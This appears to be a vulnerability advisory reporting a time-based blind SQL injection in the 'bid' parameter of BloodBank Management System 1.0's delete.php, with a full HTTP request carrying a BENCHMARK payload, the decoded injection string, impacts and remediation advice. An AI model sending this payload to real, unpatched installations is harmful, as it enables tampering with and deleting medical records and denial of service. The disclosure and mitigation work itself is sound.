- BloodBank Management System: 1.0
- Vulnerability Type: SQL Injection (Time-Based Blind)
- Severity: HIGH
- Status: Unpatched
/file/delete.php?bid=6
A time-based SQL Injection vulnerability was discovered in the delete request functionality of the BloodBank Management System version 1.0. This vulnerability occurs because the bid
parameter is not properly sanitized, allowing an attacker to inject malicious SQL commands into the backend database query.
This attack relies on a blind SQL injection technique, where the attacker uses time-based delays (via the BENCHMARK
function) to infer if the injection was successful. If the system delays its response, the attacker knows the SQL query was executed, allowing them to:
- Tamper with or delete sensitive records (e.g., blood bank data).
- Extract data slowly by chaining multiple queries.
- Cause Denial of Service (DoS) by overloading the system with intensive queries.
Below is a GET request demonstrating the vulnerability using a time-based SQL injection payload:
GET /file/delete.php?bid=3'%20AND%204994%3dBENCHMARK(5000000%2cMD5(0x51494778))--%20ntES HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodinfo.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
This payload injects the SQL command:
' AND 4994=BENCHMARK(5000000, MD5(0x51494778))-- ntES
This causes the backend to execute 5,000,000 MD5 operations, significantly delaying the response if the query executes correctly. The delay confirms that the system is vulnerable to SQL injection.
- Data Integrity Compromise: Attackers can delete or modify blood bank records.
- Denial of Service (DoS): Repeated injections can exhaust system resources, making the application unresponsive.
- Unauthorized Access: Attackers can leverage this vulnerability to further explore the database and escalate privileges.
- Use Prepared Statements: Employ parameterized queries to prevent SQL injection.
- Input Validation: Validate and sanitize the
bid
parameter to allow only expected values (e.g., numeric IDs). - Database Permissions: Restrict database user privileges to limit the potential damage of SQL injections.
- Monitoring & Logging: Track and alert unusual patterns, such as slow queries or repetitive access attempts.
- Security Testing: Perform regular penetration testing and code reviews to identify and mitigate vulnerabilities.
- Error Handling: Avoid exposing database-related errors in responses, which may assist attackers.